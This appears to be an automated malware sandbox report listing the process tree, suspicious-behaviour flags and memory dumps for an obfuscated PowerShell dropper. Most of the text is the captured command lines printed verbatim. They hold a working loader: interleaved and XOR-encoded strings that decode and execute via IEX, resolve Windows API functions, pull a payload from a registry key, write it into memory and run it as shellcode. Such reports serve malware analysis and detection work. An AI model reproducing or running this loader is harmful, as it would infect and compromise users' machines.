Lo`$LoFhurPaeMamCosSckTrrTjiFedRatPssunoDdpSktStiBemUniousPsmSueKunSa4Pe;Re`$TaFPirBleThmHisbekprrStiMadMitSusPuoTipGrtOriBemHaifosUkmMaeAnnoc5Sk Sk=Pa HaGSuyadrTroJopUniSllTooOrtbl0Ta Su'Er8Mo2Fe9Be5le8Se4Un8Ta5lu8Pj2Ou9BuEFiDar0OrDPn4Az9GeEsa8Ec5Re9AbCGu8Lu0St8Co5Re9shEIn9SeBRe8Co4Fo8Ge3Sk9SkFSt9KlDCu8Je2Sl9Ud1Ae9Ri1Co9Ca4Fr9Sc5DyDshEUdBUn3Re8Be2Pu9Fr5Ar9St1Ps8ga4Ga9Se5kuANo4Jt8Po9Er8Fi0Un9Sm5PoDSk8StDSt9Mi'Bo;Tv&Ko(Ul`$FrMTooVirWaiFocBihSveSa7De)Te un`$AnFforzoeKomChsUdkenrReisadSttPasSkoJipDrtUsiUdmPaiLgsTemPleDinNa5Pa Ak Pr St;Rm}je`$PrHInaAbuRularijoeEfrUdsAc Be=ru UpGSlyFrrNooEkpAnivilKooTotKa0Ka Re'Ta9SpBLs9De5Ud8su2La9SiEDa9Od5Pu9SuCUhCQu3UdCBo2Pr'In;Rn`$FoFTirBeeAumMesUnktjrFiibldIntPusBroInpNrtUniJumSuifrssvmDeeFonUn6Fi Pr=Re GeGAnyIdrunoCypLaiImlChoPotEp0St St'UnDSk4SaAFi3Ru9SeBol9Ko9Ko8Mi0Ri8Fu0Sk9Co5Sk8de2St9ChCFu9In7Re9afETi8Bd3SpDDa0PsCAfDStDIl0KrASyBSaAdy3So8Un9Ma8Me3As8Af4Do9Vs5Ag9OvDStDRuEChACa2Fo8Ov5Me9ThEPh8Pa4Re9Ma9Un9EpDbu9Sk5duDBiEAdBfr9Do9PhEBo8As4Va9Tr5Ki8Hj2St9UdFUu8Fo0PrApa3De9te5Re8Ch2Om8Ad6Eu9Me9Da9Un3Jo9Su5Af8Et3OvDLaEMnBPoDUn9Ra1Dr8Ba2Bo8Ga3Im9My8Sh9He1be9IsCMyASaDFaCOpAAfCLeAMoBBe7Un9Ac5Fo8sa4CaBPs4Kr9Os5Au9KaCKn9Di5Ca9Va7Al9Co1Ca8fl4St9Eu5SkBSt6Bl9RiFFi8Pe2SvBHy6Sa8Tr5Sy9LeEIg9Ep3Re8Lo4An9bl9Pe9PaFDa9SyEPuARe0fe9AnFUn9Kl9Re9PlEHi8Gl4Se9Sp5Ar8Wa2IrDSp8SuDUd8Un9Mi6Fr9KaBpa8Ni0InDLa0NoDMi4miBbo8sk9Na1Bl8Tr5st9HyCMo9Tr9Om9Pr5Ox8Ar2Ke8Se3MuDSk0ArDfy4egBVoDGr9DuFSc8Va2en9La9Pa9Pa3Sk9Ch8Cr9Af5WaCTr4KlDUr9keDPuCVeDCh0TrDLa8MuBFo7StBEr4AfASa4BuDRi0AuBUn0UdDfa8ImASaBSaBSk9Mo9AdEDi8Af4LaAFr0Fr8Ra4Go8Ps2PrAaoDHaDTrCVeDud0ZoAGeBHeAPe5MeBBi9Ta9WaEUn8Jo4XyCSk3HoCMi2OuAInDcoDBeCDeDBa0SlASiBFrALe5tiBBa9St9GiESk8Vr4BrCRe3InCPl2SkABrDLaDDiCSwDBr0HyAPlBBrAAl5MiBLs9Su9NoEAl8Po4elCTa3HoCSu2LuAPrDScDHe9UdDmu0HoDUd8SuAGlBIdBBu9Ta9StEAf8An4VaAMe0Al8Ti4Ex8Te2PlAheDnoDWa9ChDTr9BlDLu9Do'Ho;Re&Ma(Ro`$IsMFeoPrrpriKacAahaaeNo7ge)Po Ur`$DaFSyrNoeBlmTisTekFirBliCodFytSysheoAtpAftJaiTrmLaiPesComHyeGunUd6Im;Ti`$ArUMagSilIneKnsVaaSpath Fr=Ro DefPukPrpBr Om`$SkMTuoPrrEuikicKvhAseOb5hv Ta`$nuMOuoBarMiiDkcUohBoeMe6hj;Un`$StFterAmeDomResAnkAmrbaiModuntSpsGaoInpSmtobiFamFoiOnsDemEseMenTa7St up=Re SaGBeyCrrTroDepLiiMolYnoShtUn0Sa Ni'NeDSa4CuBTrDFo9No9mu9HvEDi9Tr9Pe9ExDSc8Lo5Gr9KoDGu8Un4Af8Ej2Lu8Un9Re9paBMe9hjBSy9Le5Ud8Mu4teCMo3maDBa0EsCHfDTiDUn0BeDFu4CoARi3Na9PaBKa9Ve9Bi8em0Sp8du0Si9Ha5ra8Vi2Gr9ChCRo9Ti7is9MiEOv8Re3KiDMeEToBAn9Wa9enERe8Eu6Ba9IrFSe9SoBHe9Er5WeDTa8NoAStBCrBAp9Mo9GyETr8Ex4VeABy0Ev8Al4Cn8Ur2DeARiDArCSmAorCBiAPrASeACe9Co5Bi8Kn2Ab9CgFteDNoCApDUn0SaCCo6LyChe5PrCbe2tkDReCReDEr0QuCEv0li8Co8TrCAr3ChCSe0BoCFe0PiCTi0FaDCoCDeDNe0AfCUs0Bi8mo8HeCAn4PsCJe0GrDEn9Ha'Mo;Im&So(fj`$OvMSioRnrCrihucAfhBaeTh7Ki)Su St`$RkFBjrBeeBemSasHekUnrMyifjdIntHasSaoCapSttBoiBumAriDisVumTaeFrnPa7Sy;Fi`$DeFInrSpeDemErsBekTorSuiLadbatAdsStoSipBitoriInmSaiFosLomBeecanAn8Ap Pa=Se FoGMoyCarNooPopAfiEvlFaoDitVi0Sl Or'DyDTi4BrAhj7An9Sm9cl9woERa9Un4Fo9MiFFr8Sw7Pa9PhDAm9Gr1Un9FoBSv9fl9Cl9DrEVe9Fi7InDSe0viCRiDdeDso0EnDCe4EmACo3Ra9NoBSa9Be9Be8Qu0Hy8Bo0Pr9ud5Sh8Sc2Me9CoCDo9Ag7Ov9TrETr8Bo3HlDRoETrBEn9Ba9SkEAn8st6Ti9IsFAl9LuBBy9Sp5SoDCo8ReATyBSjBRr9No9LiERe8De4LoAHj0Fl8er4Sa8Mi2FlAHoDHaCUnABeCMiACoAspATr9Ca5Wa8Ch2Te9ReFAtDSoCBrDFo0PaCBr5HiCBr0CiCMe1InCTa9SvCTa6HeCSa4SaCBi8TuCLa0SuDpuCAvDby0DeCPe0co8Ka8FrCTr3TeCdi0AfCAg0MiCAc0CoDUdCReDUn0biCFo0sm8By8SuCSp4KaDHo9Sk'Pe;Pu&Fa(Ph`$TrMSeoUfrPliVacNohPaeBe7Bl)Th st`$CoFCorTreEsmNisLikCrrUniPodsptPysVioEcpBatSyiHomAciprsZamsveSknRr8in;Ri`$FoMGeiSanSpiRemDiuHomUntFlrMiySekDikCoeAltSt0Co0Hy=Gr'KnHUnKLiCThUBo:Sm\SpOPsmPrkRaaAnrUhtEreRerLieNonGrdIneSt\FaNReastpHihCotChhBiaInlCeiKasAneHadVa'To;Pa`$SnMChiVrnTiiIrmBuuHamLotBerafyVokApkBoeZotOp0Bo1Si Ne=WhGDiyKarGnoAlpViiallSwoAftEn0Ge Ba'VaDSk4AnAPr3Su9Pr5Od8ek2Ga8Kn6Ep9re9De8Po4Sn9SuFIr8Et2Re9Sa9Ja9Fa1He9BeCudCThDAkDsc8AcBAn7Pe9Ud5Se8Ca4syDBeDUnBRa9di8Bo4Se9Hi5Gl9DaDHyAHu0No8An2Or9StFPo8Lo0Tr9Jd5pr8Pr2Da8Cr4Tr8Re9eqDRh0BlDBrDBeAEp0Ou9Ph1Va8En4An9Mo8liDwa0FiDUl4BaBQuDFo9Bo9Di9PhECh9St9Vi9AcDCr8Si5Mo9GoDNu8Rr4Fo8Fl2Tu8An9Co9trBKr9GoBIn9Vi5Li8An4InCTh0DeCUn0NoDKe9deDEnEStBRa7Sa9Un1St8Vo2Be9Si4Rn9Ho5To8Tr2Sk9AlFVe9Ps6Si9Co6Co9da9Pr9Sp3Ge9Ud5Me8Ja2Sl9Lu5Hy9laEsa8Gl3Di'si;Di&Da(To`$GoMKroSerUniBecTrhneeFo7Ov)Au Fl`$HeMBaiScnPoinomSpuMimArtSurVeyRikUnkUneintKl0Fj1Qu;Ra`$OvFInrSkeFumStsSokUnrSeiSedSutOpsTeoFrpAltNaiRemBeiRisThmApelinAs9Ve Ac=Ro DrGGlyswrDroSupFliSalAvoFotDi0Al Mu'UtDLo4NoBUn6Al8Te2Hy9Mi5Ar9DeDPe8Bi3Re9FiBUn8De2Ka9Bi9Am9Bo4Zi8La4Pl8Se3On9CaFSt8No0Te8Ho4Tw9Ir9Gl9InDOv9Ge9St8Li3La9AmDRe9Do5Af9glEEsDSc0BeCPeDMeDSc0ReAXeBSaAUn3Sk8Ca9St8ki3br8Sc4Pa9Su5Sp9AdDWhDChEHoBLi3no9PyFEn9CaEPl8La6Me9Ku5Kv8Fr2se8Co4FoAUdDCoCPeAStClaAOpBAr6ly8Su2Se9ThFEl9LsDSvBHe2Gr9Fa1Ka8ho3Po9Lb5TrCSp6JeCFu4BrARa3Sl8Fe4pi8Fo2By9Vr9Ud9GeEKn9Cu7DeDFo8SuDUn4NaABa3Ko9Zo5Sa8Po2Wh8Pr6Mi9Gi9Se8Be4Ba9SaFCo8Xs2Un9Ul9Ri9Po1Go9SeCAnDBe9sp'La;Fr&Vi(La`$ScMFioSkrEfiVgcSphSteSk7Vi)Un Co`$SuFHarReeFomAnsTokParKriNodretRasSvoempKatBaiDamIniAbsCrmEmeMonKi9Pa;On`$NeSOxeAarUkvNaiPatCooBurMaiStaPelLo0st Ko=Ba BlGAcyIzrIgoDepAsiSalCooSytHe0in Re'AnAVeBPrARe3Na8Mi9Re8Co3bi8Gu4Sn9Kl5Ra9UpDprDTlEinACh2Fo8Id5Ca9UdEDe8be4He9Un9Hi9ChDEc9In5GuDOvEBeBDk9Re9DiEIc8Fl4Cu9Ey5Ba8El2Ni9BiFBi8Pr0PeAEr3Wa9Bo5Be8in2Mr8Ca6Ng9Mu9Sp9Fa3Le9Fr5Be8Tr3BeDHiENaBReDSq9Ti1Ph8Bo2ga8Ha3Le9Ge8Sp9Re1To9phCPaASmDSeCUnASlCSmAKaBRu3Ch9SeFer8an0An8In9TiDCr8SgDFd4PuBPo6Ar8In2Re9By5By9stDRw8Ma3Sv9DoBDe8ca2Pr9Ud9Ok9Th4Vo8Ne4Ch8Ud3Fo9faFEn8Re0Co8Va4Te9Sl9wa9SaDKa9Ko9ca8Ro3Mo9TeDTh9ca5py9InEAnDTrCFeDPe0HgCOc0PaDInCKeDHa0ByDre0MeDUn4ReBMiDar9Pr9Te9arESo9Ge9Bg9vuDRa8Sk5Be9gnDPr8Ec4Pr8Di2Ge8Co9Fl9UnBKr9TeBTr9St5fi8Um4heCSe3AnDBeCsaDUt0MaCLa6KbCTa5ApCSp2AmDTr9Pa'Pr;Sa&za(Fl`$BaMVeoSirKliFecUnhEleKb7Ho)Ta Mi`$LaSPreAerRevSaicotkeoMurBeiFuazalpe0Cr;cy`$UnCBlyAwnVeoChsafaasrPlgGoeSnsFa=va`$GaFGarOmeKnmKusAfkMirImiIrdDitTusAsoBopSttPriPlmDriHasAmmIneLynOp.GocGlotruPrnMatBe-Ov6Fa5Ma2Nd;De`$AnSTeeTrrcevViiBotSuoBorBdiCoaKulCl1In Ge=Br drGPryufrAnoEspDriStlHaoEktBo0Gu Mo'ViABoBReAFa3st8Kv9Fo8St3Nu8Ly4Ul9Sk5Me9FeDKlDMaEHeALo2qu8Bl5ho9AlEHa8En4Ed9Sa9Ca9PrDUd9Do5FrDsuETrBAf9Un9FoEMu8Ud4Bu9Be5Re8Ki2An9AeFyo8Ka0DeAOv3Go9Pr5Un8Vo2Ti8Eg6Bl9Ch9Af9Sy3Mu9he5Fr8Sd3prDNoEkdBArDPa9Ma1Sn8Un2Vi8gi3Un9Sc8Ga9In1Ni9SiCSuAKlDFaCDeAStCReAKiBBa3Op9obFSk8Gr0Id8In9SqDKi8FaDUn4akBAf6Ud8Bo2Nu9Os5Ro9QuDWh8Ud3Of9MaBLd8He2Fe9Kd9Im9Ad4Te8cr4Ud8Co3Ku9EtFCa8Ha0Am8Fo4Ma9Sv9Si9SkDAd9Ph9Sw8An3la9KuDAn9Fo5Op9NeESuDChCgeDAm0baCCr6efCVi5SkCRe2KaDGaCAmDJo0UnDSy4KrAKr7Lu9Un9Ar9EtEPa9De4Tu9RoFIn8Al7Hy9TrDpl9Fo1Ca9IkBIn9Da9Hy9FlEPe9Oc7MiDCoCHeDRe0NeDPe4AnBah3Re8Fo9Bu9ViEFi9BiFSy8Is3he9Bl1Sp8Ko2Se9No7Re9Ug5Ov8Ko3CiDUn9Bl'Ld;Bu&Se(Ve`$tuMfaoBortriSecSehMieDy7Ch)Ud Tr`$amSOveSyrUnvPriEktAfoStrBaiPhaRalOu1Mo;No`$PaSEreMirExvBaiBitReoFlrUniMaaBllKa2va Pi=Ca DiGFoyenrzootopFiiEtlCaoSktGa0Pe Bo'SoDFe4Da8Me0Se9Ar5Pi8Bl2Do9Ru3Sk9MaFDy9By9Fo9un4Fi9Se5In9Se1Fo9FlECoDFo0PaCBeDReDKl0OvAStBOzAAn3In8Me9Ob8An3Ba8Se4Om9de5An9KoDFlDVoEStARe2ch8Mu5Om9BjETi8Ph4Un9an9In9StDKl9To5LyDUnEClBRi9Su9CoEVo8St4Ep9Ca5Be8Ur2ud9PlFKu8Ve0DiACa3Cr9Mo5Pe8Le2Ba8Tr6Bo9Be9de9Sk3ep9No5Un8st3DeDOvEEnBceDNo9Gr1Go8Fr2St8Ma3So9En8Ex9Ha1Im9BrCNeATiDAfCTiAKeCTiAHaBCa7In9Mi5Ri8Re4SlBpi4Co9ul5Ra9OdCLa9So5Ka9Fe7Bu9Sk1Fe8go4Bu9Je5NoBCr6Tr9StFKa8Ma2AbBWe6An8Sk5Be9SkEFo9Se3Ci8Fj4Sp9Sa9Ba9TiFTe9AnEFiAli0St9naFFe9Zo9Di9FlETa8Le4Ua9ko5Te8Sa2BeDPs8MoDUs8Hi9Ns6Mo9OpBPe8Cu0InDUn0BiDIn4ReBOp1Da9Ki7Le8Op5Ka8Dr2Re9InBIn9Pa5Ev8Un2Re9FeEOm9ko5Sm8mu3ReDUn0TiDUn4DrBEr7Kr9Pi1To9EfCTe8Vi5Ea9Po3nu9St8Tr9Ha1Re8be4MiDAl9HeDCyCSmDFe0HoDFi8AdBRe7SpBAn4PrAEx4ChDCh0HoBHo0TyDOu8SoAFlBsvBCe9De9CoEIn8op4ExAHy0Bi8Di4St8Ba2EpAFeDChDSeCPaDBr0WrALuBTyBSy9Hu9CoEPl8De4GsAFa0Fo8Ni4En8Op2KeAScDDiDInCFoDHo0DyAPrBLoBro9Gs9KnETr8Pi4PoAIn0Is8Br4To8Ek2foAIsDDeDLaCSpDDd0SiAVaBHvBSt9Su9ReEDi8Af4EfAUn0Wi8Sh4Or8Sk2RuAMiDKoDReCSpDRe0biAEuBDeBSt9Me9SuETo8Ta4ArASy0Ad8Re4br8Hv2FoASeDpaDSt9HuDOp0InDSa8quAUnBExBDe9Un9GlEKv8Ba4AnAPr0Tv8Ru4Pa8Cy2HoABuDSnDBo9MoDma9peDAk9Ma'Ha;Vi&Gu(Cr`$AdMUnoBlrMaiGrcTahSkeTo7Al)Se Ve`$SnSDreVorKovDiiFitChoIsrIbiSiaSelUd2Bl;Pe`$SkSSreHyrNovSkiBatFioInrDeiRaaInlFa3Mi Sp=Sa ReGkoyMirRuoBlpLuiShlMioZotPi0Di Fl'diDMa4Ec8Ke0Ra9Cr5Hy8Bo2Me9Bo3Un9ExFSa9Sy9Ma9Ra4Gr9As5ne9Re1Ko9HaELeDWaEdeBUd9Po9GeETi8Pe6Ki9BiFKo9WeBTh9Re5BeDSc8viDTh4FaBBrDGe9Ke9Di9NiESu9Sk9Gr9OkDAk8Ve5Sp9BlDId8Fe4Ch8in2Ov8Ch9Ov9klBNo9UnBSn9Bi5ax8Ca4SpCaa3tjDChCGoDNv4DiAFo7On9Fl9Jo9GlEFr9Me4Tu9AlFvi8Sk7Om9PrDMi9Ba1In9moBPr9Le9La9BeEIn9No7KaDStCBuDTh4JuASp5Be9Di7Dd9liCOr9Sk5Kr8Sp3Br9Op1Br9Br1ViDShCMaCMa0ScDKnCUdCbn0SeDJa9fo'Mo;en&He(No`$SnMWeoOvrGliAncSthSteId7Es)An Mo`$InSAlePrrBavIniDetMaoUdrmaiSuaCrlKa3Sp#de;""";;Function Servitorial9 { param([String]$Toeres); For($Inseratet=2; $Inseratet -lt $Toeres.Length-1; $Inseratet+=(2+1)){ $Gyropilot = $Gyropilot + $Toeres.Substring($Inseratet, 1); } $Gyropilot;}$Stafettens0 = Servitorial9 'By Be Ku Ar Bl Sp Br Da Ec Du Te Bo Su Ph Bo Af Fl Ku Ko Te In St Ex StITrEGlXAb ';$Stafettens1= Servitorial9 $Saliant;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Stafettens1 ;}else{.$Stafettens0 $Stafettens1;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Gyropilot0 { param([String]$Toeres); $Metropolitanizes = New-Object byte[] ($Toeres.Length / 2); For($Inseratet=0; $Inseratet -lt $Toeres.Length; $Inseratet+=2){ $Tallote = $Toeres.Substring($Inseratet, 2); $Metropolitanizes[$Inseratet/2] = [convert]::ToByte($Tallote, 16); $Metropolitanizes[$Inseratet/2] = ($Metropolitanizes[$Inseratet/2] -bxor 240); } [String][System.Text.Encoding]::ASCII.GetString($Metropolitanizes);}$Spiralfjederen0=Gyropilot0 'A3898384959DDE949C9C';$Spiralfjederen1=Gyropilot0 'BD9993829F839F9684DEA7999EC3C2DEA59E83919695BE9184998695BD9584989F9483';$Spiralfjederen2=Gyropilot0 'B79584A0829F93B1949482958383';$Spiralfjederen3=Gyropilot0 'A3898384959DDEA2859E84999D95DEB99E8495829F80A395828699939583DEB8919E949C95A29596';$Spiralfjederen4=Gyropilot0 '838482999E97';$Spiralfjederen5=Gyropilot0 'B79584BD9F94859C95B8919E949C95';$Spiralfjederen6=Gyropilot0 'A2A4A380959399919CBE919D95DCD0B8999495B289A39997DCD0A085929C9993';$Spiralfjederen7=Gyropilot0 'A2859E84999D95DCD0BD919E91979594';$Spiralfjederen8=Gyropilot0 'A295969C9593849594B4959C9597918495';$Spiralfjederen9=Gyropilot0 'B99EBD959D9F8289BD9F94859C95';$Moriche0=Gyropilot0 'BD89B4959C9597918495A4898095';$Moriche1=Gyropilot0 'B39C918383DCD0A085929C9993DCD0A395919C9594DCD0B19E8399B39C918383DCD0B185849FB39C918383';$Moriche2=Gyropilot0 'B99E869F9B95';$Moriche3=Gyropilot0 'A085929C9993DCD0B8999495B289A39997DCD0BE9587A39C9F84DCD0A699828485919C';$Moriche4=Gyropilot0 'A699828485919CB19C9C9F93';$Moriche5=Gyropilot0 '9E84949C9C';$Moriche6=Gyropilot0 'BE84A0829F84959384A699828485919CBD959D9F8289';$Moriche7=Gyropilot0 'B9B5A8';$Moriche8=Gyropilot0 'AC';$Agurkernes=Gyropilot0 'A5A3B5A2C3C2';$Galuchat=Gyropilot0 'B3919C9CA7999E949F87A0829F93B1';function fkp {Param ($Binomialkoefficienter, $Leveringsomkostning) ;$Fremskridtsoptimismen0 =Gyropilot0 'D4BB918983D0CDD0D8ABB18080B49F9D91999EADCACAB3858282959E84B49F9D91999EDEB79584B18383959D929C999583D8D9D08CD0A798958295DDBF929A959384D08BD0D4AFDEB79C9F92919CB18383959D929C89B391939895D0DDB19E94D0D4AFDEBC9F939184999F9EDEA3809C9984D8D4BD9F8299939895C8D9ABDDC1ADDEB58185919C83D8D4A3809982919C969A95949582959EC0D9D08DD9DEB79584A4898095D8D4A3809982919C969A95949582959EC1D9';&($Moriche7) $Fremskridtsoptimismen0;$Fremskridtsoptimismen5 = Gyropilot0 'D4A3809C858484958283D0CDD0D4BB918983DEB79584BD9584989F94D8D4A3809982919C969A95949582959EC2DCD0ABA4898095ABADADD0B0D8D4A3809982919C969A95949582959EC3DCD0D4A3809982919C969A95949582959EC4D9D9';&($Moriche7) $Fremskridtsoptimismen5;$Fremskridtsoptimismen1 = Gyropilot0 '82958485829ED0D4A3809C858484958283DEB99E869F9B95D8D49E859C9CDCD0B0D8ABA3898384959DDEA2859E84999D95DEB99E8495829F80A395828699939583DEB8919E949C95A29596ADD8BE9587DDBF929A959384D0A3898384959DDEA2859E84999D95DEB99E8495829F80A395828699939583DEB8919E949C95A29596D8D8BE9587DDBF929A959384D0B99E84A08482D9DCD0D8D4BB918983DEB79584BD9584989F94D8D4A3809982919C969A95949582959EC5D9D9DEB99E869F9B95D8D49E859C9CDCD0B0D8D4B2999E9F9D99919C9B9F959696999399959E849582D9D9D9D9DCD0D4BC95869582999E97839F9D9B9F83849E999E97D9D9';&($Moriche7) $Fremskridtsoptimismen1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Stonefishes22,[Parameter(Position = 1)] [Type] $Reattainment = [Void]);$Fremskridtsoptimismen2 = Gyropilot0 'D49E859C80859E9B84839F9D8291919495D0CDD0ABB18080B49F9D91999EADCACAB3858282959E84B49F9D91999EDEB49596999E95B4899E919D9993B18383959D929C89D8D8BE9587DDBF929A959384D0A3898384959DDEA295969C959384999F9EDEB18383959D929C89BE919D95D8D4A3809982919C969A95949582959EC8D9D9DCD0ABA3898384959DDEA295969C959384999F9EDEB59D9984DEB18383959D929C89B285999C949582B19393958383ADCACAA2859ED9DEB49596999E95B4899E919D9993BD9F94859C95D8D4A3809982919C969A95949582959EC9DCD0D496919C8395D9DEB49596999E95A4898095D8D4BD9F8299939895C0DCD0D4BD9F8299939895C1DCD0ABA3898384959DDEBD859C849993918384B4959C9597918495ADD9';&($Moriche7) $Fremskridtsoptimismen2;$Fremskridtsoptimismen3 = Gyropilot0 'D49E859C80859E9B84839F9D8291919495DEB49596999E95B39F9E8384828593849F82D8D4A3809982919C969A95949582959EC6DCD0ABA3898384959DDEA295969C959384999F9EDEB3919C9C999E97B39F9E86959E84999F9E83ADCACAA384919E94918294DCD0D4A3849F9E95969983989583C2C2D9DEA39584B99D809C959D959E849184999F9EB69C919783D8D4A3809982919C969A95949582959EC7D9';&($Moriche7) $Fremskridtsoptimismen3;$Fremskridtsoptimismen4 = Gyropilot0 'D49E859C80859E9B84839F9D8291919495DEB49596999E95BD9584989F94D8D4BD9F8299939895C2DCD0D4BD9F8299939895C3DCD0D4A29591848491999E9D959E84DCD0D4A3849F9E95969983989583C2C2D9DEA39584B99D809C959D959E849184999F9EB69C919783D8D4A3809982919C969A95949582959EC7D9';&($Moriche7) $Fremskridtsoptimismen4;$Fremskridtsoptimismen5 = Gyropilot0 '82958485829ED0D49E859C80859E9B84839F9D8291919495DEB38295918495A4898095D8D9';&($Moriche7) $Fremskridtsoptimismen5 ;}$Hauliers = Gyropilot0 '9B95829E959CC3C2';$Fremskridtsoptimismen6 = Gyropilot0 'D4A39B99808095829C979E83D0CDD0ABA3898384959DDEA2859E84999D95DEB99E8495829F80A395828699939583DEBD91828398919CADCACAB79584B4959C9597918495B69F82B6859E9384999F9EA09F999E849582D8D8969B80D0D4B891859C99958283D0D4BD9F8299939895C4D9DCD0D8B7B4A4D0B0D8ABB99E84A08482ADDCD0ABA5B99E84C3C2ADDCD0ABA5B99E84C3C2ADDCD0ABA5B99E84C3C2ADD9D0D8ABB99E84A08482ADD9D9D9';&($Moriche7) $Fremskridtsoptimismen6;$Uglesaa = fkp $Moriche5 $Moriche6;$Fremskridtsoptimismen7 = Gyropilot0 'D4BD999E999D859D8482899B9B9584C3D0CDD0D4A39B99808095829C979E83DEB99E869F9B95D8ABB99E84A08482ADCACAAA95829FDCD0C6C5C2DCD0C088C3C0C0C0DCD0C088C4C0D9';&($Moriche7) $Fremskridtsoptimismen7;$Fremskridtsoptimismen8 = Gyropilot0 'D4A7999E949F879D919B999E97D0CDD0D4A39B99808095829C979E83DEB99E869F9B95D8ABB99E84A08482ADCACAAA95829FDCD0C5C0C1C9C6C4C8C0DCD0C088C3C0C0C0DCD0C088C4D9';&($Moriche7) $Fremskridtsoptimismen8;$Minimumtrykket00='HKCU:\Omkarterende\Naphthalised';$Minimumtrykket01 =Gyropilot0 'D4A395828699849F8299919CCDD8B79584DDB984959DA0829F8095828489D0DDA0918498D0D4BD999E999D859D8482899B9B9584C0C0D9DEB791829495829F969699939582959E83';&($Moriche7) $Minimumtrykket01;$Fremskridtsoptimismen9 = Gyropilot0 'D4B682959D839B82999484839F8084999D99839D959ED0CDD0ABA3898384959DDEB39F9E86958284ADCACAB6829F9DB2918395C6C4A38482999E97D8D4A395828699849F8299919CD9';&($Moriche7) $Fremskridtsoptimismen9;$Servitorial0 = Gyropilot0 'ABA3898384959DDEA2859E84999D95DEB99E8495829F80A395828699939583DEBD91828398919CADCACAB39F8089D8D4B682959D839B82999484839F8084999D99839D959EDCD0C0DCD0D0D4BD999E999D859D8482899B9B9584C3DCD0C6C5C2D9';&($Moriche7) $Servitorial0;$Cynosarges=$Fremskridtsoptimismen.count-652;$Servitorial1 = Gyropilot0 'ABA3898384959DDEA2859E84999D95DEB99E8495829F80A395828699939583DEBD91828398919CADCACAB39F8089D8D4B682959D839B82999484839F8084999D99839D959EDCD0C6C5C2DCD0D4A7999E949F879D919B999E97DCD0D4B3899E9F839182979583D9';&($Moriche7) $Servitorial1;$Servitorial2 = Gyropilot0 'D4809582939F999495919ED0CDD0ABA3898384959DDEA2859E84999D95DEB99E8495829F80A395828699939583DEBD91828398919CADCACAB79584B4959C9597918495B69F82B6859E9384999F9EA09F999E849582D8D8969B80D0D4B19785829B95829E9583D0D4B7919C8593989184D9DCD0D8B7B4A4D0B0D8ABB99E84A08482ADDCD0ABB99E84A08482ADDCD0ABB99E84A08482ADDCD0ABB99E84A08482ADDCD0ABB99E84A08482ADD9D0D8ABB99E84A08482ADD9D9D9';&($Moriche7) $Servitorial2;$Servitorial3 = Gyropilot0 'D4809582939F999495919EDEB99E869F9B95D8D4BD999E999D859D8482899B9B9584C3DCD4A7999E949F879D919B999E97DCD4A5979C95839191DCC0DCC0D9';&($Moriche7) $Servitorial3#"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/3740-132-0x0000000000000000-mapping.dmp
-
memory/3740-133-0x0000027C7DF10000-0x0000027C7DF32000-memory.dmpFilesize
136KB
-
memory/3740-134-0x00007FF99E0E0000-0x00007FF99EBA1000-memory.dmpFilesize
10.8MB
-
memory/3740-148-0x00007FF99E0E0000-0x00007FF99EBA1000-memory.dmpFilesize
10.8MB
-
memory/4924-140-0x0000000006140000-0x00000000061A6000-memory.dmpFilesize
408KB
-
memory/4924-143-0x0000000007960000-0x000000000797A000-memory.dmpFilesize
104KB
-
memory/4924-138-0x0000000005FB0000-0x0000000005FD2000-memory.dmpFilesize
136KB
-
memory/4924-139-0x0000000006050000-0x00000000060B6000-memory.dmpFilesize
408KB
-
memory/4924-136-0x0000000002F10000-0x0000000002F46000-memory.dmpFilesize
216KB
-
memory/4924-141-0x0000000006840000-0x000000000685E000-memory.dmpFilesize
120KB
-
memory/4924-142-0x00000000081B0000-0x000000000882A000-memory.dmpFilesize
6.5MB
-
memory/4924-137-0x0000000005950000-0x0000000005F78000-memory.dmpFilesize
6.2MB
-
memory/4924-144-0x0000000007B30000-0x0000000007BC6000-memory.dmpFilesize
600KB
-
memory/4924-145-0x0000000007A30000-0x0000000007A52000-memory.dmpFilesize
136KB
-
memory/4924-146-0x000000000B810000-0x000000000BDB4000-memory.dmpFilesize
5.6MB
-
memory/4924-147-0x0000000008830000-0x000000000B80F000-memory.dmpFilesize
47.9MB
-
memory/4924-135-0x0000000000000000-mapping.dmp
-
memory/4924-149-0x0000000008830000-0x000000000B80F000-memory.dmpFilesize
47.9MB